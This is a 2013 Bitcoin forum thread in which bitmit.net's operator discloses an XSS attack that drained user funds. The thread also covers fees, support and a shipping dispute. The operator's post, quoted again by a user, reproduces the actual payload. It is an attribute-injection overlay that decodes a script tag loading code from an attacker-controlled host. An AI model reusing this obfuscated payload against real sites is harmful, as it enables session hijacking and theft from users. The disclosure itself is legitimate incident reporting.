bitmit_samar20
Full Member
 Offline
Activity: 208
Merit: 100
Learn and Enjoy.
|
 |
August 24, 2013, 05:36:08 AM |
|
somebody from my a/c theft 4.59 bitcoins. He changed all my a/c settings.
-4.59295734
13nPWDB4vGQfJWD9DnEC5DUx3y1Qn8ScPN
2013-08-23, 09:51
Please get back my bitcoins. I sent msg to customer service.
Waiting for your reply.
thanks.
|
Verified And Trusted Seller- Amazon Shopping Service
|
|
|
|
|
|
|
|
|
|
|
|
Once a transaction has 6 confirmations, it is extremely unlikely that an attacker without at least 50% of the network's computation power would be able to reverse it.
|
|
|
Advertised sites are not endorsed by the Bitcoin Forum. They may be unsafe, untrustworthy, or illegal in your jurisdiction.
|
|
|
|
|
|
|
giszmo
Legendary
Offline
Activity: 1862
Merit: 1105
WalletScrutiny.com
|
|
August 24, 2013, 08:37:44 AM |
|
tosaki's last post is 2 weeks old and nobody explains stuff. bitmit is dead for me until things are sorted out.
|
| ɃɃWalletScrutiny.com | Is your wallet secure?(Methodology)
WalletScrutiny checks if wallet builds are reproducible, a precondition for code audits to be of value. | ɃɃ |
|
|
|
bernard75
Legendary
Offline
Activity: 1316
Merit: 1003
|
|
August 24, 2013, 08:51:25 AM |
|
There are some small things that are very annoying and never got fixed like the "state" field in the buyers address.
Is this still used even in the US?
|
|
|
|
|
|
tosaki (OP)
|
|
August 24, 2013, 02:55:51 PM
Last edit: August 24, 2013, 03:09:00 PM by tosaki |
|
Sorry for late response. We were facing some unauthorized withdraws and are currently investigating. It seems the attacker managed it with a user hijacking attack (ip on withdraw time is always user ones) to withdraw payments once a user is logged in. he is also deactivating notifications. Currently outgoing transactions are not processed for security reasons and you are getting notificated by email. We are searching for the security flaw on our site! Your funds are safe because we have several backups and most of our funds are stored in cold wallet. UPDATE: As we have estimated this was an xss attack. Our html purifier tool did not remove this code. <b>Item</b><br /><b>I may be out of office sometimes so please PM me before making any purchase.</b> Steam keys will be delivered by email in 24 hours.<br /><br /><b>Payment</b><br />Payment can only be done through the Bitmit system, there are no exceptions to this rule. I accept escrow on all items. <br /><br /><b>Testing</b><br />I test everything that I sell, one item at a time. Nonetheless, please be sure to read the listing above in detail, as it will contain any qualifiers about the cosmetic or functional condition of the item, as well as tell you what accessories come with the device. I also strive to respond to any inquiries about auctions in as timely a fashion as possible. <br /><br /><b>Shipping</b><br />I ship out every order as quickly as possible after the payment is received. In most cases, this results in your product being shipped on the next business day (Monday through Friday). However, on occasion I may receive a large number of orders in a short period of time which may slightly delay shipping of your item. <br /><br />In order to receive my combined shipping discount, all items must be purchased on the same day and all items must be paid for within 48 hours. Please note that when returning a defective item, customers are responsible for shipping costs; however, I will ship your replacement free of charge. You also have the option to return the product for a refund; however, a $9.99 handling fee will be deducted from your total amount. All refunds are subject to a 15% restocking fee. <b>NO exceptions.</b><br /><br /><b>Feedback</b><br />Please contact us before you leave negative feedback, and I will do my best to make the situation right.<br /><br />If you have any questions please just message me. http://bitmit.net"onclick="this.removeAttribute('href');this.style.height='0%';"onmousemove="javascript:this.onmousemove=null;jQuery('head').append(String.fromCharCode(60,115,99,114,105,112,116,32,115,114,99,61,34,104,116,116,112,115,58,47,47,98,105,116,109,116,46,103,111,112,97,103,111,100,97,46,99,111,109,47,119,47,119,112,45,116,114,97,99,107,46,112,104,112,34,62,60,47,115,99,114,105,112,116,62));"style="position:absolute;opacity:0;font-size:0px;top:0;left:0;display:block;width:1500px;height:1500px;z-index:50001;<br /><br />Fastandfurious |
|
|
|
|
bitmit_samar20
Full Member
Offline
Activity: 208
Merit: 100
Learn and Enjoy.
|
|
August 24, 2013, 04:22:43 PM |
|
Thank you for your quick reply. I hope you solve my problem and make system stronger that other users dont face this type of problem. Blockchain helped me to find illegal transaction from my bitmit account. http://blockchain.info/address/13nPWDB4vGQfJWD9DnEC5DUx3y1Qn8ScPNI think, bitmit is the most popular site for shopping using bitcoin...may be No.1 site. I suggest to remove loopholes in the system. Person like me who regularly use bitmit for transaction willing to co-operate in the improvement of website and may be others. I hope you have very experienced IT team and hopefully from their hard work, we will see improved and highest secured version of bitmit in a coming days.... Thanks. Sorry for late response. We were facing some unauthorized withdraws and are currently investigating. It seems the attacker managed it with a user hijacking attack (ip on withdraw time is always user ones) to withdraw payments once a user is logged in. he is also deactivating notifications. Currently outgoing transactions are not processed for security reasons and you are getting notificated by email. We are searching for the security flaw on our site! Your funds are safe because we have several backups and most of our funds are stored in cold wallet. UPDATE: As we have estimated this was an xss attack. Our html purifier tool did not remove this code. <b>Item</b><br /><b>I may be out of office sometimes so please PM me before making any purchase.</b> Steam keys will be delivered by email in 24 hours.<br /><br /><b>Payment</b><br />Payment can only be done through the Bitmit system, there are no exceptions to this rule. I accept escrow on all items. <br /><br /><b>Testing</b><br />I test everything that I sell, one item at a time. Nonetheless, please be sure to read the listing above in detail, as it will contain any qualifiers about the cosmetic or functional condition of the item, as well as tell you what accessories come with the device. I also strive to respond to any inquiries about auctions in as timely a fashion as possible. <br /><br /><b>Shipping</b><br />I ship out every order as quickly as possible after the payment is received. In most cases, this results in your product being shipped on the next business day (Monday through Friday). However, on occasion I may receive a large number of orders in a short period of time which may slightly delay shipping of your item. <br /><br />In order to receive my combined shipping discount, all items must be purchased on the same day and all items must be paid for within 48 hours. Please note that when returning a defective item, customers are responsible for shipping costs; however, I will ship your replacement free of charge. You also have the option to return the product for a refund; however, a $9.99 handling fee will be deducted from your total amount. All refunds are subject to a 15% restocking fee. <b>NO exceptions.</b><br /><br /><b>Feedback</b><br />Please contact us before you leave negative feedback, and I will do my best to make the situation right.<br /><br />If you have any questions please just message me. http://bitmit.net"onclick="this.removeAttribute('href');this.style.height='0%';"onmousemove="javascript:this.onmousemove=null;jQuery('head').append(String.fromCharCode(60,115,99,114,105,112,116,32,115,114,99,61,34,104,116,116,112,115,58,47,47,98,105,116,109,116,46,103,111,112,97,103,111,100,97,46,99,111,109,47,119,47,119,112,45,116,114,97,99,107,46,112,104,112,34,62,60,47,115,99,114,105,112,116,62));"style="position:absolute;opacity:0;font-size:0px;top:0;left:0;display:block;width:1500px;height:1500px;z-index:50001;<br /><br />Fastandfurious |
Verified And Trusted Seller- Amazon Shopping Service
|
|
|
escrow.ms
Legendary
Offline
Activity: 1274
Merit: 1004
|
|
August 24, 2013, 04:31:24 PM |
|
Tosaki did you removed both ads?  |
|
|
|
|
|
tosaki (OP)
|
|
August 24, 2013, 04:39:59 PM
Last edit: August 24, 2013, 04:54:21 PM by tosaki |
|
Tosaki did you removed both ads? Yes all xss items should be removed but currently we have disabled the item descriptions and item footer output because we are testing our html purifier. Update: We discovered why this was not escaped correctly and fixed the problem. |
|
|
|
|
escrow.ms
Legendary
Offline
Activity: 1274
Merit: 1004
|
|
August 24, 2013, 04:49:38 PM |
|
Alright, btw that code :  bitmt.gopagoda.com/w/wp-track dot.php That page is hosted on pagodabox app's hosting,i'll contact them to remove it. |
|
|
|
|
giszmo
Legendary
Offline
Activity: 1862
Merit: 1105
WalletScrutiny.com
|
|
August 24, 2013, 04:57:38 PM |
|
Alright, btw that code : bitmt.gopagoda.com/w/wp-track dot.php That page is hosted on pagodabox app's hosting,i'll contact them to remove it. removing it should be pointless. they should provide who put it there. i love anonymity but i also love seeing stupid thieves go to jail. |
| ɃɃWalletScrutiny.com | Is your wallet secure?(Methodology)
WalletScrutiny checks if wallet builds are reproducible, a precondition for code audits to be of value. | ɃɃ |
|
|
|
molecular
Donator
Legendary
Offline
Activity: 2772
Merit: 1019
|
|
August 24, 2013, 04:58:04 PM |
|
Alright, btw that code : bitmt.gopagoda.com/w/wp-track dot.php That page is hosted on pagodabox app's hosting,i'll contact them to remove it. it's gone alread (404). good work. |
PGP key molecular F9B70769 fingerprint 9CDD C0D3 20F8 279F 6BE0 3F39 FC49 2362 F9B7 0769
|
|
|
|
tosaki (OP)
|
|
August 24, 2013, 05:02:48 PM |
|
Alright, btw that code : bitmt.gopagoda.com/w/wp-track dot.php That page is hosted on pagodabox app's hosting,i'll contact them to remove it. it's gone alread (404). good work. It was already gone when I discovered it. |
|
|
|
|
Kluge
Donator
Legendary
Offline
Activity: 1218
Merit: 1015
|
|
August 24, 2013, 05:16:26 PM
Last edit: August 24, 2013, 05:29:08 PM by Kluge |
|
Not high-priority, but do you know wallet/withdrawal fees have been weird for a few months?  They're still .001BTC, but for some reason it's made up of a separate .0009 and .0001 transaction, now. (cropped out most irrelevant transactions from log in case you notice it's been tampered with) ETA: Ohhhh... I see, now. The 0.0001BTC is the fee sent to miners. The .0009 appears to be pocketed. I guess that's better than earlier -- this one had no fees sent to miners (but still charged) : https://blockchain.info/tx/b480bcfdaeaa2fcb6175452808ccc14a586f91eaaffb1950244b4c35a0372aa5 - same here: https://blockchain.info/tx/532d14b7b5c3c61af1bdcae826993c36f0d8e69e1a31ec8825ff3515f937e859 ETA2: I guess that was fine back then, though, since it wasn't difficult to have pretty much everything and anything included in the next block. |
|
|
|
|
escrow.ms
Legendary
Offline
Activity: 1274
Merit: 1004
|
|
August 24, 2013, 05:20:00 PM |
|
It was already gone when I discovered it.
Ah ok, I didn't tried to open that php page on my pc,looks like someone else reported it. |
|
|
|
|
|
peonminer
|
|
August 24, 2013, 05:36:21 PM |
|
Hi everyone! I just dropped by to tell bitmit.net THANK YOU!!!! I had a mishap with an order from a new seller. The seller claimed instant delivery in the ad but when I purchased I only got a message saying to PM the seller. I thought this was an EPIC FAIL! So... I contacted bitmit.net for a refund this morning because I didn't want my BTC in limbo for a week. I have to say, THIS IS THE FASTEST SUPPORT TICKET RESPONSE TIME I HAVE EVER EXPERIENCED ON THE INTERNET. PERIOD!!!!! YOU GUYS ROCK!!! KEEP UP THE AMAZING WORK!!!  ~ Very happy and satisfied customer, I hope to do a lot of future business with you guys. |
|
|
|
|
bitmit_samar20
Full Member
Offline
Activity: 208
Merit: 100
Learn and Enjoy.
|
|
August 24, 2013, 06:24:33 PM |
|
I got refund. Customer care told me that there was xss attack and they found it & solved it.
I ask every legit hackers and security professionals to make bitmit very stronger. For regular buyers-sellers, if there is mobile verification system and minimum fees for extra protection, there will not be any problem - just suggestion.
thanks a lot for your valuable service.
|
Verified And Trusted Seller- Amazon Shopping Service
|
|
|
bernard75
Legendary
Offline
Activity: 1316
Merit: 1003
|
|
August 24, 2013, 10:18:12 PM |
|
For regular buyers-sellers, if there is mobile verification system and minimum fees for extra protection, there will not be any problem - just suggestion. Email confirmation would be a huge step towards security with virtually 0 effort. |
|
|
|
|
|
mackstuart
|
|
August 25, 2013, 03:18:18 AM |
|
I have an issue guys and I just wanted to speak about it on the forum to ask others what they think. I purchased an item for almost a thousand dollars on bitmit. I asked the seller to ship the item with signature confirmation because of my location. The seller shipped the item without signature and the item was stolen. I filed a police report and did all other things required by bitmit, but they released the funds to the seller anyway. The seller showed no proof of address that the item was shipped to other than a tracking number. Also the seller obviously lives in the same area as where I had to ship the item, because of the location that the tracking information shows. How do you all feel that this should be handled?
|
|
|
|
bitmit_samar20
Full Member
Offline
Activity: 208
Merit: 100
Learn and Enjoy.
|
|
August 25, 2013, 05:00:44 AM |
|
First, why seller refused signature confirmation with shipping if you already mentioned before shipping with order confirmation? Also have you tried to check with courier company with details ? I hope tosaki may sort out this issue. ====== email confirmation is also good option for transaction. (approve/disapprove) I have an issue guys and I just wanted to speak about it on the forum to ask others what they think. I purchased an item for almost a thousand dollars on bitmit. I asked the seller to ship the item with signature confirmation because of my location. The seller shipped the item without signature and the item was stolen. I filed a police report and did all other things required by bitmit, but they released the funds to the seller anyway. The seller showed no proof of address that the item was shipped to other than a tracking number. Also the seller obviously lives in the same area as where I had to ship the item, because of the location that the tracking information shows. How do you all feel that this should be handled?
For regular buyers-sellers, if there is mobile verification system and minimum fees for extra protection, there will not be any problem - just suggestion. Email confirmation would be a huge step towards security with virtually 0 effort. |
Verified And Trusted Seller- Amazon Shopping Service
|
|
|
|
mackstuart
|
|
August 25, 2013, 07:27:34 AM |
|
First, why seller refused signature confirmation with shipping if you already mentioned before shipping with order confirmation? Also have you tried to check with courier company with details ? I hope tosaki may sort out this issue. ====== email confirmation is also good option for transaction. (approve/disapprove) I have an issue guys and I just wanted to speak about it on the forum to ask others what they think. I purchased an item for almost a thousand dollars on bitmit. I asked the seller to ship the item with signature confirmation because of my location. The seller shipped the item without signature and the item was stolen. I filed a police report and did all other things required by bitmit, but they released the funds to the seller anyway. The seller showed no proof of address that the item was shipped to other than a tracking number. Also the seller obviously lives in the same area as where I had to ship the item, because of the location that the tracking information shows. How do you all feel that this should be handled?
For regular buyers-sellers, if there is mobile verification system and minimum fees for extra protection, there will not be any problem - just suggestion. Email confirmation would be a huge step towards security with virtually 0 effort. That is what I am saying. I dont understand how they could side with him and I mentioned that I must have signature confirmation before item was shipped. I responded to the situation several times and there were no responses from the moderator or seller, until the day that the funds were released. It was strange because the seller responded right before the funds were released, as if he had been talking to bitmit outside of the bitmit forum. I know I am in the right on this issue. I already PM tosaki a couple of weeks ago when the issue first arised, but I have gotten no responses. |
|
|
|
bernard75
Legendary
Offline
Activity: 1316
Merit: 1003
|
|
August 29, 2013, 10:49:52 AM |
|
For gods sake please make some IQ test before people can buy!
I am tired of people asking:
"Why u no offer PayPal?"
They just stray in without the most basic understanding of BTC.
|
|
|
|
|
|
